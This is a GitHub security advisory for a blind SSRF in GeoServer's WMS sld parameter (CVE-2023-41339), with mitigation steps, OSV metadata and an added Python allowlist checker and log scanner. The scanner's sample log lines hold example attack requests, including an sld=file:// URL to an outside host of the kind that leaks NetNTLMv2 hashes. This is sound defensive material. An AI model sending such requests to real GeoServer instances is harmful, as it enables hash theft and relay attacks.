GHSA-CQPC-X2C6-2GMF
Vulnerability from github – Published: 2023-10-24 19:20 – Updated: 2024-03-06 23:57
Summary
The WMS specification defines an sld=<url> parameter for the GetMap, GetLegendGraphic and GetFeatureInfo operations for user-supplied "dynamic styling". Enabling the use of dynamic styles without also configuring URL checks provides the opportunity for Server-Side Request Forgery.
It is possible to use this for "Blind SSRF" on the WMS endpoint to steal NetNTLMv2 hashes via file requests to malicious servers.
Details
This vulnerability requires:
- WMS Settings dynamic styling being enabled
- Security URL checks being disabled, or being enabled but allowing `file:\\*` access
Impact
This vulnerability can be used to steal user NetNTLMv2 hashes which could be relayed or cracked externally to gain further access.
Mitigation
The ability to reference an external URL location is defined by the WMS standard GetMap, GetFeatureInfo and GetLegendGraphic operations. These operations are defined by an industry and international standard and cannot be redefined by the GeoServer application in isolation.
To disable dynamic styling on GeoServer 2.10.3 and GeoServer 2.11.1:
- Navigate to the Services > WMS Settings page
- Locate the Dynamic styling heading
- Select the Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST checkbox.
Resolution
To allow dynamic styling safely on GeoServer 2.22.5 and GeoServer 2.23.2:
- Navigate to Security > URL Checks
- Enable the URL Checks are enabled setting
- Check the user manual for examples of how to trust specific locations (https://docs.geoserver.org/latest/en/user/security/urlchecks.html#example-regex-patterns), for instance `^https://styles\.server\.net/cartography/.*$`
- Enable dynamic styling on the Services > WMS Settings page by deselecting the Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST checkbox.
Safe use of dynamic styling is the default in GeoServer 2.24.0.
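As an added illustration (not GeoServer's own code), the allowlist logic the URL check step above describes, seeded with the advisory's example pattern, together with a scan of constructed access-log lines for sld= values that would have failed it; the log format and sample hosts are assumptions:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allowlist in the spirit of GeoServer's regex URL checks, seeded with the
# example pattern quoted in the advisory. Only a matching http(s) URL passes.
ALLOWED_SLD_PATTERNS = [
    re.compile(r"^https://styles\.server\.net/cartography/.*$"),
]


def sld_url_allowed(url, patterns=ALLOWED_SLD_PATTERNS):
    """True only if url is http(s) and matches an allowlist pattern.

    A file: URL (the route to NetNTLMv2 leakage in the advisory) and any
    unlisted host both fail; that is what 'URL Checks are enabled' buys you.
    """
    url = url.strip()
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return False
    return any(p.match(url) for p in patterns)


def flag_wms_requests(log_lines, patterns=ALLOWED_SLD_PATTERNS):
    """Return sld= values in WMS request log lines that fail the allowlist.

    A retrospective check for servers that ran with dynamic styling enabled
    and URL checks off. WMS parameter names are case-insensitive.
    """
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)  # percent-decodes values
        for key, values in query.items():
            if key.lower() == "sld":
                flagged.extend(v for v in values if not sld_url_allowed(v, patterns))
    return flagged


# Constructed access-log lines (not real traffic); sld targets use documentation IP ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Oct/2023:19:20:34 +0000] "GET /geoserver/wms?SERVICE=WMS'
    '&REQUEST=GetMap&LAYERS=topp:states&SLD=https://styles.server.net/cartography/states.sld HTTP/1.1" 200 5120',
    '10.0.0.9 - - [24/Oct/2023:19:21:02 +0000] "GET /geoserver/wms?SERVICE=WMS'
    '&REQUEST=GetLegendGraphic&LAYER=topp:states&sld=file://203.0.113.7/share/style.sld HTTP/1.1" 200 310',
    '10.0.0.9 - - [24/Oct/2023:19:21:40 +0000] "GET /geoserver/wms?SERVICE=WMS'
    '&REQUEST=GetFeatureInfo&sld=http://198.51.100.20/s.sld HTTP/1.1" 200 88',
]
```

Running `flag_wms_requests(SAMPLE_LOG)` returns the file: URL and the unlisted http: host while the styles.server.net request passes, which is the split an enabled URL check enforces at request time.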
References
- Disabling usage of dynamic styling in GetMap, GetFeatureInfo and GetLegendGraphic requests: https://docs.geoserver.org/latest/en/user/services/wms/webadmin.html#disabling-usage-of-dynamic-styling-in-getmap-getfeatureinfo-and-getlegendgraphic-requests
- URL Checks: https://docs.geoserver.org/latest/en/user/security/urlchecks.html
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.geoserver:gs-wms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.22.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.geoserver:gs-wms"
},
"ranges": [
{
"events": [
{
"introduced": "2.23.0"
},
{
"fixed": "2.23.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.geoserver.web:gs-web-app"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.22.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.geoserver.web:gs-web-app"
},
"ranges": [
{
"events": [
{
"introduced": "2.23.0"
},
{
"fixed": "2.23.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-41339"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-24T19:20:34Z",
"nvd_published_at": "2023-10-25T18:17:30Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nThe WMS specification defines an ``sld=\u003curl\u003e`` parameter for GetMap, GetLegendGraphic and GetFeatureInfo operations for user supplied \"dynamic styling\". Enabling the use of dynamic styles, without also configuring URL checks, provides the opportunity for Service Side Request Forgery.\n \nIt is possible to use this for \"Blind SSRF\" on the WMS endpoint to steal NetNTLMv2 hashes via file requests to malicious servers.\n\n### Details\n\nThis vulnerability requires:\n\n* WMS Settings dynamic styling being enabled\n* Security URL checks to be disabled, or to be enabled and allowing ``file:\\\\*`` access\n\n### Impact\n\nThis vulnerability can be used to steal user NetNTLMv2 hashes which could be relayed or cracked externally to gain further access.\n\n### Mitigation\n\nThe ability to reference an external URL location is defined by the WMS standard GetMap, GetFeatureInfo and GetLegendGraphic operations. These operations are defined by an Industry and International standard and cannot be redefined by the GeoServer application in isolation.\n\nTo disable dynamic styling on GeoServer 2.10.3 and GeoServer 2.11.1:\n\n1. Navigate to **Services \u003e WMS Settings** page\n2. Locate **Dynamic styling** heading\n3. Select the **Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST** checkbox.\n\n### Resolution\n\nTo allow dynamic styling safely on GeoServer 2.22.5 and GeoServer 2.23.2:\n\n1. Navigate to **Security \u003e URL Checks**\n2. Enable **URL Checks are enabled** setting\n3. Check the user manual for [examples](https://docs.geoserver.org/latest/en/user/security/urlchecks.html#example-regex-patterns) of how to trust specific locations:\n ``^https://styles\\.server\\.net/cartography/.*$``\n4. Enable dynamic styling on the **Services \u003e WMS Settings** page, deselect the **Disable usage of SLD and SLD_BODY parameters in GET requests and user styles in POST** checkbox.\n\nUse of dynamic styling safely is on by default in GeoServer 2.24.0.\n\n### References\n\n* [Disabling usage of dynamic styling in GetMap, GetFeatureInfo and GetLegendGraphic requests](https://docs.geoserver.org/latest/en/user/services/wms/webadmin.html#disabling-usage-of-dynamic-styling-in-getmap-getfeatureinfo-and-getlegendgraphic-requests)\n* [URL Checks](https://docs.geoserver.org/latest/en/user/security/urlchecks.html)",
"id": "GHSA-cqpc-x2c6-2gmf",
"modified": "2024-03-06T23:57:16Z",
"published": "2023-10-24T19:20:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-cqpc-x2c6-2gmf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41339"
},
{
"type": "PACKAGE",
"url": "https://github.com/geoserver/geoserver"
},
{
"type": "WEB",
"url": "https://github.com/geoserver/geoserver/releases/tag/2.22.5"
},
{
"type": "WEB",
"url": "https://github.com/geoserver/geoserver/releases/tag/2.23.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Unsecured WMS dynamic styling sld=\u003curl\u003e parameter affords blind unauthenticated SSRF"
}